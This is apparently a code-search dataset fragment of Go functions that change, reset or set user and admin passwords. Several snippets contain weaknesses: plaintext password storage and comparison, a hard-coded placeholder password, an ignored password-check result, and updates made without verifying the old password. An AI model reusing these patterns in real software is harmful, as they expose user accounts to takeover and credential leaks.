cryptError := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)\n\tif cryptError != nil {\n\t\treturn cryptError\n\t}\n\tif err := db.open(); err != nil {\n\t\treturn err\n\t}\n\tdefer db.close()\n\n\tusrPath := []string{\"users\", email}\n\treturn db.bolt.SetValue(usrPath, \"password\", string(cryptPw))\n}", "func updatePasswordHandler(w http.ResponseWriter, r *http.Request){\n\tuserId, err := strconv.ParseInt(r.FormValue(\"userId\"), 10, 64)\n\tcheck(err)\n\n\t// TODO: implement updatePassword form, and get actual password from there.\n\tpasswordHashInts := GetPasswordHash256(\"#NewPassword1234\")\n\n\t// Update user's password in the database.\n\tprf(\"passwordHashInts[0]: %T %#v\\n\", passwordHashInts[0], passwordHashInts[0])\n\tDbQuery(`\n\t\tUPDATE $$User\n\t\tSET PasswordHash = ARRAY[$2::bigint, $3::bigint, $4::bigint, $5::bigint]\n\t\tWHERE Id = $1::bigint`,\n\t\tuserId,\n\t\tpasswordHashInts[0],\n\t\tpasswordHashInts[1],\n\t\tpasswordHashInts[2],\n\t\tpasswordHashInts[3])\n\n\t// TODO: Send password update confirmation email\n\n\t// Create session (encrypted userId).\n\tCreateSession(w, r, userId)\n\n\tprf(\"Updated password for user %d\", userId)\n\n\tserveHtml(w, \"<h2>You successfully updated your password!</h2>\")\n}", "func (s *MemberFabricConfiguration) SetAdminPassword(v string) *MemberFabricConfiguration {\n\ts.AdminPassword = &v\n\treturn s\n}", "func (o KubernetesClusterWindowsProfileOutput) AdminPassword() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v KubernetesClusterWindowsProfile) *string { return v.AdminPassword }).(pulumi.StringPtrOutput)\n}", "func (c *Client) UpdatePassword(cfg *ADConf, filters map[*Field][]string, newPassword string) error {\n\tpwdEncoded, err := formatPassword(newPassword)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tnewValues := map[*Field][]string{\n\t\tFieldRegistry.UnicodePassword: {pwdEncoded},\n\t}\n\n\treturn c.UpdateEntry(cfg, filters, newValues)\n}", "func (admin *Admin) SetPassword(password string) error {\n\t// Automatically generates salt while hashing.\n\t// second parameter is the adaptive cost factor,\n\t// which controls the speed at which the algorithm runs.\n\t// The higher the cost factor, the slower the algorithm runs.\n\t// It wants the password as a byte slice, so convert using []byte()\n\tpasswordHash, err := bcrypt.GenerateFromPassword([]byte(password), bcryptCost)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error generating bcrypt hash: %v\", err)\n\t}\n\tadmin.PassHash = passwordHash\n\treturn nil\n}", "func (UserService) UpdatePassword(dto dto.UserEditPasswordDto) int64 {\n\tsalt, _ := account.MakeSalt()\n\tpwd, _ := account.HashPassword(dto.Password, salt)\n\tu := userDao.Get(dto.Id, false)\n\t//u.Password = pwd\n\t//u.Salt = salt\n\tc := userDao.Update(&u, map[string]interface{}{\n\t\t\"password\": pwd,\n\t\t\"salt\": salt,\n\t})\n\treturn c.RowsAffected\n}", "func (repository Users) UpdatePassword(password string, userID uint64) error {\n\n\tstatement, error := repository.db.Prepare(\"UPDATE users SET password = ? where id = ?\")\n\n\tif error != nil {\n\t\treturn error\n\t}\n\n\tdefer statement.Close()\n\n\tif _, error = statement.Exec(password, userID); error != nil {\n\t\treturn error\n\t}\n\n\treturn nil\n}", "func (ad *admininterface) AdminResetUserPassword(username string) error {\n\taccount, err := ad.Get(username)\n\tif err != nil {\n\t\treturn err\n\t}\n\taccount.PasswordHash = \"\"\n\taccount.MustChangePassword = true\n\treturn ad.Upd(account)\n}", "func UpdatePassword(username string, oldPass string, newPass string, rePass string) error {\n\tif newPass != rePass {\n\t\treturn errors.New(\"The second entry of the new password doesn't match\")\n\t}\n\terr := updatePassword(username, oldPass, newPass)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn errors.New(\"Incorrect username or old password\")\n\t}\n\treturn nil\n}", "func (o KubernetesClusterWindowsProfilePtrOutput) AdminPassword() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *KubernetesClusterWindowsProfile) *string {\n\t\tif v == nil {\n\t\t\treturn nil\n\t\t}\n\t\treturn v.AdminPassword\n\t}).(pulumi.StringPtrOutput)\n}", "func ChangePassword(w http.ResponseWriter, r *http.Request) {\n\tauth := service.GetSessionMember(r)\n\tmember := model.GetMemberByID(auth.ID)\n\n\tif err := r.ParseMultipartForm(setting.FileMaxSize); err != nil {\n\t\tLogger.Error(err.Error())\n\t}\n\n\tnewPassword := r.FormValue(\"newPassword\")\n\tconfirmPassword := r.FormValue(\"confirmPassword\")\n\toldPassword := r.FormValue(\"oldPassword\")\n\n\tpasswordData := map[string]string{\n\t\t\"password\": newPassword,\n\t\t\"confirmPassword\": confirmPassword,\n\t}\n\n\tvalidateError := model.ValidatePassword(passwordData)\n\n\t// check if password is correct\n\t_, err := model.Authenticated(member.LoginID, oldPassword)\n\n\tif err != nil {\n\t\tvalidateError[\"oldPassword\"] = \"Password is not correct.\"\n\t}\n\n\tif len(validateError) == 0 {\n\t\tmodel.UpdatePassword(newPassword, member)\n\t\thttp.Redirect(w, r, \"/my_page\", 301)\n\t}\n\n\ttemplateData := map[string]interface{}{\n\t\t\"title\": \"Change Password\",\n\t\t\"validateError\": validateError,\n\t\t\"auth\": auth,\n\t}\n\n\ttmpl := template.Must(template.ParseFiles(\"template/admin_members/change_password.tmpl\", setting.UserTemplate))\n\tif err := tmpl.ExecuteTemplate(w, \"base\", templateData); err != nil {\n\t\tLogger.Error(err.Error())\n\t}\n}", "func (h *AuthHandler) UpdatePassword(w http.ResponseWriter, r *http.Request) {\n\tview := NewView(r)\n\n\tuser := context.User(r.Context())\n\tif user == nil {\n\t\thttp.Redirect(w, r, \"/signin\", http.StatusFound)\n\t\treturn\n\t}\n\n\temail := user.Email\n\toldPassword := view.FormValue(\"oldPassword\", true)\n\tnewPassword := view.FormValue(\"newPassword\", true)\n\tconfirmPassword := view.FormValue(\"confirmPassword\", true)\n\n\tif view.HasError() {\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\n\tif len(newPassword) < h.PasswordLength || len(confirmPassword) < h.PasswordLength {\n\t\tview.InsertFlashError(\"Passwords must be at least \", h.PasswordLength, \" characters long\")\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\tif newPassword != confirmPassword {\n\t\tview.InsertFlashError(\"Passwords must be matched\")\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\n\terr := h.AuthInteractor.UpdatePassword(email, oldPassword, newPassword)\n\tif err != nil {\n\t\tview.InsertFlashError(err.Error())\n\t\tview.Render(w, \"auth/password\")\n\t\treturn\n\t}\n\n\tview.InsertFlash(\"Your password succesfully changed\")\n\tview.Render(w, \"auth/password\")\n}", "func (s UserAuthServiceImpl) UpdatePassword(userId uuid.UUID, newPassword []byte) error {\n\n\tupdateData := struct {\n\t\tSet interface{} `json:\"$set\" bson:\"$set\"`\n\t}{\n\t\tSet: struct {\n\t\t\tPassword []byte `json:\"password\" bson:\"password\"`\n\t\t}{\n\t\t\tPassword: newPassword,\n\t\t},\n\t}\n\n\tfilter := struct {\n\t\tObjectId uuid.UUID `json:\"objectId\" bson:\"objectId\"`\n\t}{\n\t\tObjectId: userId,\n\t}\n\tupdateErr := s.UpdateUserAuth(filter, &updateData)\n\tif updateErr != nil {\n\t\treturn updateErr\n\t}\n\treturn nil\n}", "func UpdateAccountPassword(w http.ResponseWriter, r *http.Request) {\n\tlogin := mux.Vars(r)[\"login\"]\n\toauth, ok := OAuthToken(r)\n\tif !ok {\n\t\tpanic(\"Request was authorized but no OAuth token is available!\") // this should never happen\n\t}\n\n\taccount, ok := data.GetAccountByLogin(login)\n\tif !ok {\n\t\tPrintErrorJSON(w, r, \"The requested account does not exist\", http.StatusNotFound)\n\t\treturn\n\t}\n\n\tif oauth.Token.AccountUUID.String != account.UUID || !oauth.Match.Contains(\"account-write\") {\n\t\tPrintErrorJSON(w, r, \"Access to requested account forbidden\", http.StatusUnauthorized)\n\t\treturn\n\t}\n\n\tpwData := &struct {\n\t\tPasswordOld string `json:\"password_old\"`\n\t\tPasswordNew string `json:\"password_new\"`\n\t\tPasswordNewRepeat string `json:\"password_new_repeat\"`\n\t}{}\n\tdec := json.NewDecoder(r.Body)\n\t_ = dec.Decode(pwData)\n\n\tif !account.VerifyPassword(pwData.PasswordOld) {\n\t\terr := &util.ValidationError{\n\t\t\tMessage: \"Unable to set password\",\n\t\t\tFieldErrors: map[string]string{\"password_old\": \"Wrong password\"}}\n\t\tPrintErrorJSON(w, r, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif len(pwData.PasswordNew) < 6 {\n\t\terr := &util.ValidationError{\n\t\t\tMessage: \"Unable to set password\",\n\t\t\tFieldErrors: map[string]string{\"password_new\": \"Password must be at least 6 characters long\"}}\n\t\tPrintErrorJSON(w, r, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif pwData.PasswordNew != pwData.PasswordNewRepeat {\n\t\terr := &util.ValidationError{\n\t\t\tMessage: \"Unable to set password\",\n\t\t\tFieldErrors: map[string]string{\"password_new_repeat\": \"Repeated password does not match\"}}\n\t\tPrintErrorJSON(w, r, err, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr := account.UpdatePassword(pwData.PasswordNew)\n\tif err != nil {\n\t\tPrintErrorJSON(w, r, err, http.StatusInternalServerError)\n\t\treturn\n\t}\n}", "func (c *Client) ModifyInstancePassword(instanceId string, args *ModifyInstancePasswordArgs) error {\n\tcryptedPass, err := Aes128EncryptUseSecreteKey(c.Config.Credentials.SecretAccessKey, args.AdminPass)\n\tif err != nil {\n\t\treturn err\n\t}\n\targs.AdminPass = cryptedPass\n\n\tjsonBytes, jsonErr := json.Marshal(args)\n\tif jsonErr != nil {\n\t\treturn jsonErr\n\t}\n\tbody, err := bce.NewBodyFromBytes(jsonBytes)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn ModifyInstancePassword(c, instanceId, body)\n}", "func (userInfo *NoAuthUserInfo) UpdatePassword(id string, passwordInfo *passwordChangeInfo) (int, error) {\n\treturn 0, errors.New(\"Update not supported\")\n}", "func UserPassUpdate(w http.ResponseWriter, r *http.Request, u *User) error {\n\t// set the name and email from the form data\n\tpass := r.FormValue(\"password\")\n\tif err := u.SetPassword(pass); err != nil {\n\t\treturn RenderError(w, err, http.StatusBadRequest)\n\t}\n\t// save the updated password to the database\n\tif err := database.SaveUser(u); err != nil {\n\t\treturn RenderError(w, err, http.StatusBadRequest)\n\t}\n\treturn RenderText(w, http.StatusText(http.StatusOK), http.StatusOK)\n}", "func (u *User) UpdatePassword(password []byte) error {\n\terr := database.DB.Model(&u).Update(\"password\", password).Error\n\treturn err\n}", "func ChangePass(w http.ResponseWriter, r *http.Request) {\r\n\tlogin := strings.Trim(r.FormValue(\"login\"), \" \")\r\n\tpass := strings.Trim(r.FormValue(\"pass\"), \" \")\r\n\r\n\t// Check params\r\n\tif login == \"\" || pass == \"\" {\r\n\t\twriteResponse(w, \"Login and password required\\n\", http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\tnewPass := strings.Trim(r.FormValue(\"newPass\"), \" \")\r\n\tif newPass == \"\" {\r\n\t\twriteResponse(w, \"newPass required\\n\", http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\tif Auth[login] != pass {\r\n\t\twriteResponse(w, \"Wrong pass\\n\", http.StatusBadRequest)\r\n\t\treturn\r\n\t}\r\n\r\n\tuser := model.User{}\r\n\terr := user.Get(login, pass) // в Auth можно сохранять id, чтобы не делать этот запрос\r\n\tlog.Println(\"user\", user)\r\n\tif err != nil {\r\n\t\twriteResponse(w, \"Something wrong\\n\", http.StatusInternalServerError)\r\n\t\treturn\r\n\t}\r\n\r\n\tuser.Pass = newPass\r\n\terr = user.Save()\r\n\tif err != nil {\r\n\t\twriteResponse(w, \"Error update password in database\\n\", http.StatusInternalServerError)\r\n\t\treturn\r\n\t}\r\n\r\n\tAuth[user.Login] = user.Pass\r\n\r\n\twriteResponse(w, \"Password changed\\n\", http.StatusOK)\r\n}", "func SaveAdmin(admin *model.Admin) error {\n\n\tpassword, err := crypto.AESEncrypt(admin.Password)\n\tif err != nil {\n\t\treturn err\n\t}\n\tadmin.Password = password\n\tif admin.Password == \"\" {\n\t\treturn fmt.Errorf(\"Encrypt failure\")\n\t}\n\treturn db.From(\"admin\").Save(admin)\n\n}", "func WithAdminPassword(password string) Option {\n\treturn func(o *P) {\n\t\to.Password = password\n\t}\n}", "func UpdatePassword(w http.ResponseWriter, r *http.Request, userID string) {\n\t//parse body\n\tvar updateRequest requests.UpdatePasswordRequest\n\terr := json.NewDecoder(r.Body).Decode(&updateRequest)\n\n\t//check if body was valid\n\tif err != nil {\n\t\thttp.Error(w, messages.BAD_REQUEST, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\t//get password(-hash) of current user\n\tcurrentUserHash := database.GetPasswordHashForUserId(userID)\n\n\t// make sure that the (user-)password which the user provided is valid\n\tencryption.CheckPassword(updateRequest.UserPassword, currentUserHash)\n\n\t//password was valid\n\tif !checker.Check(updateRequest.Password, checker.PASSWORD_REGEX) {\n\t\t// password was invalid --> return error\n\t\thttp.Error(w, messages.PASSWORD_INVALID, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\t//get current time\n\tcurrentTime := time.Now()\n\n\t//encrypt the new password\n\tencryptedPassword, nonce := encryption.ToSecuredPassword(updateRequest.Password, updateRequest.UserPassword, currentTime)\n\n\tpassword := models.Password{\n\t\tPasswordID: uuid.MustParse(updateRequest.PasswordID),\n\t\tPassword: encryptedPassword,\n\t\tNonce: nonce,\n\t\tUseLocation: updateRequest.UseLocation,\n\t\tCreatedOn: currentTime,\n\t}\n\n\t// ... and update password entry in database\n\tdatabase.UpdatePassword(userID, &password)\n\n\t//return ok\n\tw.WriteHeader(200)\n}", "func ChangePassword(templateDir string) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tu, a := currentUser(r)\n\t\tif u == \"\" {\n\t\t\thttp.Error(w, \"no user information\", http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\n\t\tif r.Method == \"GET\" {\n\t\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{})\n\t\t\treturn\n\t\t}\n\n\t\tr.ParseForm()\n\n\t\tp := r.FormValue(\"oldPassword\")\n\t\tpN := r.FormValue(\"newPassword\")\n\t\tpNC := r.FormValue(\"confirmNewPassword\")\n\n\t\t// Check that this user is actually who they claim they are\n\t\tok, err := database.CheckCredentials(u, p)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t} else if !ok {\n\t\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{Error: \"Invalid username or password\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Make sure the user REALLY knows their new password and it isn't empty\n\t\tif pN != pNC || pN == \"\" {\n\t\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{Error: \"Passwords do not match.\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Perform the password update\n\t\tbpass, err := bcrypt.GenerateFromPassword([]byte(pN), bcrypt.DefaultCost)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\terr = database.UpdatePassword(u, bpass)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tFetch(templateDir, \"changePassword.html\").Execute(w, u, a, m{Success: \"Password updated successfully.\"})\n\t}\n}", "func (h *UserHandler) UpdatePassword(c *gin.Context) {\n\tcurrentUser, err := h.userSrv.GetCurrentUser(c)\n\tif err != nil {\n\t\trespondError(c, http.StatusUnauthorized, err.Error())\n\t\treturn\n\t}\n\n\t// get data from body\n\tvar userVals serializers.UserUpdatePasswordRequest\n\tif err := c.ShouldBindJSON(&userVals); err != nil {\n\t\trespondError(c, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\n\tif err := currentUser.CheckPassword(*userVals.OldPassowrd); err != nil {\n\t\trespondError(c, http.StatusForbidden, errors.PasswordIncorrect.Error())\n\t\treturn\n\t}\n\n\tif *userVals.NewPassword != *userVals.PasswordConfirmation {\n\t\trespondError(c, http.StatusUnprocessableEntity, errors.ConfirmationPasswordIncorrect.Error())\n\t\treturn\n\t}\n\n\tvar data = map[string]interface{}{\n\t\t\"jwt\": nil,\n\t\t\"password\": *userVals.NewPassword,\n\t}\n\n\tif errUpdate := h.userSrv.UpdatePassword(currentUser, data); errUpdate != nil {\n\t\trespondError(c, http.StatusUnprocessableEntity, errUpdate.Error())\n\t\treturn\n\t}\n\n\tc.JSON(http.StatusOK, serializers.Resp{Result: \"Password Updated\", Error: nil})\n}", "func updatePassword(username string, oldPass string, newPass string) error {\n\t// connect to db\n\tdb, err := gorm.Open(\"sqlite3\", dbPath)\n\tdefer db.Close()\n\tif err != nil {\n\t\treturn err\n\t}\n\t// get user with given username\n\tvar user user\n\tdbc := db.Where(\n\t\t\"username = ?\",\n\t\tusername,\n\t).First(&user)\n\tif dbc.Error != nil {\n\t\treturn dbc.Error\n\t}\n\tif bcrypt.CompareHashAndPassword(user.HashedPassword, []byte(oldPass)) != nil {\n\t\treturn errors.New(\"Incorrect old password\")\n\t}\n\thashedNew, err := bcrypt.GenerateFromPassword([]byte(newPass), 14)\n\tif err != nil {\n\t\treturn errors.New(\"Error hashing password\")\n\t}\n\tuser.HashedPassword = hashedNew\n\tif dbc := db.Save(user); dbc.Error != nil {\n\t\treturn dbc.Error\n\t}\n\treturn nil\n}", "func (p *LDAPUserProvider) UpdatePassword(inputUsername string, newPassword string) error {\n\tconn, err := p.connect(p.configuration.User, p.configuration.Password)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"unable to update password. Cause: %w\", err)\n\t}\n\tdefer conn.Close()\n\n\tprofile, err := p.getUserProfile(conn, inputUsername)\n\n\tif err != nil {\n\t\treturn fmt.Errorf(\"unable to update password. Cause: %w\", err)\n\t}\n\n\tswitch {\n\tcase p.supportExtensionPasswdModify:\n\t\tmodifyRequest := ldap.NewPasswordModifyRequest(\n\t\t\tprofile.DN,\n\t\t\t\"\",\n\t\t\tnewPassword,\n\t\t)\n\n\t\terr = conn.PasswordModify(modifyRequest)\n\tcase p.configuration.Implementation == schema.LDAPImplementationActiveDirectory:\n\t\tmodifyRequest := ldap.NewModifyRequest(profile.DN, nil)\n\t\tutf16 := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM)\n\t\t// The password needs to be enclosed in quotes\n\t\t// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/6e803168-f140-4d23-b2d3-c3a8ab5917d2\n\t\tpwdEncoded, _ := utf16.NewEncoder().String(fmt.Sprintf(\"\\\"%s\\\"\", newPassword))\n\t\tmodifyRequest.Replace(\"unicodePwd\", []string{pwdEncoded})\n\n\t\terr = conn.Modify(modifyRequest)\n\tdefault:\n\t\tmodifyRequest := ldap.NewModifyRequest(profile.DN, nil)\n\t\tmodifyRequest.Replace(\"userPassword\", []string{newPassword})\n\n\t\terr = conn.Modify(modifyRequest)\n\t}\n\n\tif err != nil {\n\t\treturn fmt.Errorf(\"unable to update password. Cause: %w\", err)\n\t}\n\n\treturn nil\n}", "func UpdatePassword(context *gin.Context) {\n\tuserProfile := models.UserProfile{}\n\tcontext.ShouldBindBodyWith(&userProfile, binding.JSON)\n\n\tmodifiedCount, err := userprofileservice.UpdateByEmail(userProfile)\n\tif modifiedCount == 0 {\n\t\tcontext.JSON(http.StatusNotFound, gin.H{\"message\": \"User not found\"})\n\t\treturn\n\t}\n\n\tif err != nil {\n\t\tcontext.JSON(http.StatusInternalServerError, gin.H{\"message\": \"Failed to update user\"})\n\t\tcontext.Abort()\n\t\treturn\n\t}\n\n\tcontext.JSON(http.StatusOK, gin.H{\"message\": \"ok\"})\n}", "func (orm *ORM) ResetPassword(ctx context.Context, adminID string, password string) (bool, error) {\n\tvar _Admin models.Admin\n\n\terr := orm.DB.DB.First(&_Admin, \"id = ?\", adminID).Error\n\tif errors.Is(err, gorm.ErrRecordNotFound) {\n\t\treturn false, errors.New(\"AdminNotFound\")\n\t}\n\n\t//update password\n\t_Admin.Password = password\n\torm.DB.DB.Save(&_Admin)\n\n\t//invalidate the redis data pertaining to this admin\n\tredisErr := orm.rdb.Set(ctx, fmt.Sprintf(\"%s\", adminID), nil, 1*time.Second).Err()\n\tif redisErr != nil {\n\t\treturn false, redisErr\n\t}\n\treturn true, nil\n}", "func (as *AdminServer) ResetPassword(w http.ResponseWriter, r *http.Request) {\n\tu := ctx.Get(r, \"user\").(models.User)\n\tsession := ctx.Get(r, \"session\").(*sessions.Session)\n\tif !u.PasswordChangeRequired {\n\t\tFlash(w, r, \"info\", \"Please reset your password through the settings page\")\n\t\tsession.Save(r, w)\n\t\thttp.Redirect(w, r, \"/settings\", http.StatusTemporaryRedirect)\n\t\treturn\n\t}\n\tparams := newTemplateParams(r)\n\tparams.Title = \"Reset Password\"\n\tswitch {\n\tcase r.Method == http.MethodGet:\n\t\tparams.Flashes = session.Flashes()\n\t\tsession.Save(r, w)\n\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\treturn\n\tcase r.Method == http.MethodPost:\n\t\tnewPassword := r.FormValue(\"password\")\n\t\tconfirmPassword := r.FormValue(\"confirm_password\")\n\t\tnewHash, err := auth.ValidatePasswordChange(u.Hash, newPassword, confirmPassword)\n\t\tif err != nil {\n\t\t\tFlash(w, r, \"danger\", err.Error())\n\t\t\tparams.Flashes = session.Flashes()\n\t\t\tsession.Save(r, w)\n\t\t\tw.WriteHeader(http.StatusBadRequest)\n\t\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\t\treturn\n\t\t}\n\t\tu.PasswordChangeRequired = false\n\t\tu.Hash = newHash\n\t\tif err = models.PutUser(&u); err != nil {\n\t\t\tFlash(w, r, \"danger\", err.Error())\n\t\t\tparams.Flashes = session.Flashes()\n\t\t\tsession.Save(r, w)\n\t\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\t\tgetTemplate(w, \"reset_password\").ExecuteTemplate(w, \"base\", params)\n\t\t\treturn\n\t\t}\n\t\t// TODO: We probably want to flash a message here that the password was\n\t\t// changed successfully. The problem is that when the user resets their\n\t\t// password on first use, they will see two flashes on the dashboard-\n\t\t// one for their password reset, and one for the \"no campaigns created\".\n\t\t//\n\t\t// The solution to this is to revamp the empty page to be more useful,\n\t\t// like a wizard or something.\n\t\tas.nextOrIndex(w, r)\n\t}\n}", "func (h *userHandler) changePassword(ctx context.Context, rw http.ResponseWriter, r *http.Request) {\n\n\tvar user = &model.User{}\n\n\t_ = json.NewDecoder(r.Body).Decode(user)\n\n\tif user.Login == \"\" || user.Password == \"\" {\n\n\t\th.serv.writeResponse(ctx, rw, \"Login or password are empty\", http.StatusBadRequest, nil)\n\n\t\treturn\n\t}\n\n\terr := h.serv.DB.UserCol.UpdatePassword(ctx, user)\n\n\tif err != nil {\n\n\t\th.serv.writeResponse(ctx, rw, err.Error(), http.StatusBadRequest, user)\n\n\t\treturn\n\t}\n\n\th.serv.writeResponse(ctx, rw, \"password was updated\", http.StatusOK, user)\n\n\treturn\n\n}", "func (c *RegistrationController) SetPassword(w http.ResponseWriter, r *http.Request) {\n\n\t// parse the JSON coming from the client\n\tvar passRequest passwordRequest\n\tdecoder := json.NewDecoder(r.Body)\n\n\t// check if the parsing succeeded\n\tif err := decoder.Decode(&passRequest); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Error parsing form values failed\")\n\t\treturn\n\t}\n\n\tif err := passwordsAreValid(passRequest.Password, passRequest.PasswordConfirmation); err != nil {\n\t\tlog.Println(err)\n\t\tc.Error500(w, err, \"Password invalid\")\n\t\treturn\n\t}\n\n\t//validate link\n\tuser, err := models.FindUserByVerificationUUID(passRequest.UUID)\n\n\tif err != nil {\n\t\tlog.Printf(\"Error setting password: %v is not a valid UUID\", passRequest.UUID)\n\t\tc.BadRequest(w, nil, \"Error verifying email address: %v is not a valid user identifier\", passRequest.UUID)\n\t\treturn\n\t}\n\n\tif !user.PasswordInvalid {\n\t\tc.Error500(w, nil, \"Password is already set\")\n\t\treturn\n\t}\n\n\tif err := user.UpdatePassword(passRequest.Password); err != nil {\n\t\tlog.Printf(\"Error updating the password in the database: %v\", err)\n\t\tc.Error500(w, err, \"Error updating the password in the database\")\n\t\treturn\n\t}\n\n\tc.Plain(\"\", w, r)\n\treturn\n}", "func (s *shares) UpdatePassword(shareID int, password string) error {\n\treturn s.baseShareUpdate(strconv.Itoa(shareID), \"password\", password)\n}", "func UpdatePasswordByEmail(email string, newPassword string) bool {\n\tdb := GetConnect()\n\tdefer db.Close()\n\n\tnewPassword = encryptPassword(newPassword)\n\t_, err := db.Model(new(Userr)).Set(\"password = ?\", newPassword).Where(\"email = ?\", email).Update()\n\treturn err == nil\n}", "func UpdateAdmin(w http.ResponseWriter, r *http.Request) {\n\tvar body UpdateAdminRequest\n\tif err := read.JSON(r.Body, &body); err != nil {\n\t\trender.Error(w, admin.WrapError(admin.ErrorBadRequestType, err, \"error reading request body\"))\n\t\treturn\n\t}\n\n\tif err := body.Validate(); err != nil {\n\t\trender.Error(w, err)\n\t\treturn\n\t}\n\n\tid := chi.URLParam(r, \"id\")\n\tauth := mustAuthority(r.Context())\n\tadm, err := auth.UpdateAdmin(r.Context(), id, &linkedca.Admin{Type: body.Type})\n\tif err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error updating admin %s\", id))\n\t\treturn\n\t}\n\n\trender.ProtoJSON(w, adm)\n}", "func (c *myClient) updateUserPasswordByName(u string, p string) (err error) {\n\tuserRef, err := c.findObjectByNameReturnReference(\"user\", u)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif userRef == nil {\n\t\tlogger.Fatalf(\"%s not found. Exiting\", u)\n\t}\n\tlogger.Infof(\"Changing %s's password\\n\", u)\n\tlogger.Infof(\"Using \" + c.username)\n\tpostBody := fmt.Sprintf(`\n\t\t\t{\n\t\t\t\t\"type\": \"CredentialUpdateParameters\",\n\t\t\t\t\"newCredential\": {\n\t\t\t\t\t\"type\": \"PasswordCredential\",\n\t\t\t\t\t\"password\": \"%s\"\n\t\t\t\t}\n\t\t\t}\n\t\t`, p)\n\tc.LoadAndValidate()\n\t_, _, err = c.httpPost(fmt.Sprintf(\"user/%s/updateCredential\", userRef), postBody)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif c.username == u {\n\t\tc.password = p\n\t\tc.LoadAndValidate()\n\t}\n\treturn err\n}", "func (p *LDAPUserProvider) UpdatePassword(inputUsername string, newPassword string) error {\n\tconn, err := p.connect(p.configuration.User, p.configuration.Password)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to update password. Cause: %s\", err)\n\t}\n\tdefer conn.Close()\n\n\tprofile, err := p.getUserProfile(conn, inputUsername)\n\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to update password. Cause: %s\", err)\n\t}\n\n\tmodifyRequest := ldap.NewModifyRequest(profile.DN, nil)\n\n\tswitch p.configuration.Implementation {\n\tcase schema.LDAPImplementationActiveDirectory:\n\t\tutf16 := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM)\n\t\t// The password needs to be enclosed in quotes\n\t\t// https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/6e803168-f140-4d23-b2d3-c3a8ab5917d2\n\t\tpwdEncoded, _ := utf16.NewEncoder().String(fmt.Sprintf(\"\\\"%s\\\"\", newPassword))\n\t\tmodifyRequest.Replace(\"unicodePwd\", []string{pwdEncoded})\n\tdefault:\n\t\tmodifyRequest.Replace(\"userPassword\", []string{newPassword})\n\t}\n\n\terr = conn.Modify(modifyRequest)\n\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Unable to update password. Cause: %s\", err)\n\t}\n\n\treturn nil\n}", "func (a *AllApiService) EdgeUpdateEdgeAdminPassword(ctx _context.Context, body EdgeUpdateEdgeAdminPassword) (EdgeUpdateEdgeAdminPasswordResult, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue EdgeUpdateEdgeAdminPasswordResult\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/edge/updateEdgeAdminPassword\"\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = &body\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil 